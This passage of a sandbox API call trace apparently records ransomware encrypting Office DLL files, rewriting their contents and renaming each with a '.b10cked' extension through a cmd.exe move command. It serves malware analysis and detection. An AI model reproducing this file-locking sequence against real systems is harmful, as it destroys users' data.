hThread=0x114, dwProcessId=0xc4, dwThreadId=0x130)) returned 1 [0167.788] CloseHandle (hObject=0x1b4) returned 1 [0167.788] CloseHandle (hObject=0x114) returned 1 [0167.788] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.788] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.788] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0167.788] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.788] ReleaseMutex (hMutex=0xf8) returned 1 [0167.788] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.788] ReleaseMutex (hMutex=0xf8) returned 1 [0167.788] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.789] ReleaseMutex (hMutex=0xf8) returned 1 [0167.789] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.789] ReleaseMutex (hMutex=0xf8) returned 1 [0167.789] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.789] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22457834713) returned 1 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xb360 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.791] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.791] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.791] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.791] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xae78 [0167.791] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0167.812] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0167.812] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xb360 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xb360 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.813] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x59af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x59af, lpOverlapped=0x0) returned 1 [0167.814] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.814] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x59af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x59af, lpOverlapped=0x0) returned 1 [0167.815] SetFilePointer (in: hFile=0x114, lDistanceToMove=-22959, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x59b1 [0167.815] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x59af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x59af, lpOverlapped=0x0) returned 1 [0167.816] SetFilePointer (in: hFile=0x114, lDistanceToMove=-22959, 
lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x59b1 [0167.816] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x59af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x59af, lpOverlapped=0x0) returned 1 [0167.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0167.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0167.821] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xb360 [0167.821] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0167.822] CloseHandle (hObject=0x114) returned 1 [0167.823] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX") returned 0x3c [0167.824] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0167.824] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x748, dwThreadId=0x8cc)) returned 1 [0167.834] CloseHandle (hObject=0x1b4) returned 1 [0167.834] CloseHandle (hObject=0x114) returned 1 [0167.834] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.834] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.834] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0167.834] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.834] ReleaseMutex (hMutex=0xf8) returned 1 [0167.834] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.834] ReleaseMutex (hMutex=0xf8) returned 1 [0167.834] 
WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.834] ReleaseMutex (hMutex=0xf8) returned 1 [0167.834] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.834] ReleaseMutex (hMutex=0xf8) returned 1 [0167.834] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22462398072) returned 1 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x7b60 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ecec*=0) returned 0x7678 [0167.836] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x7b60 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x7b60 [0168.071] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.071] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.071] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3daf, 
lpOverlapped=0x0) returned 1 [0168.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.128] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3daf, lpOverlapped=0x0) returned 1 [0168.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=-15791, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3db1 [0168.128] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3daf, lpOverlapped=0x0) returned 1 [0168.129] SetFilePointer (in: hFile=0x114, lDistanceToMove=-15791, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3db1 [0168.129] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3daf, lpOverlapped=0x0) returned 1 [0168.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0168.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0168.135] SetFilePointer (in: 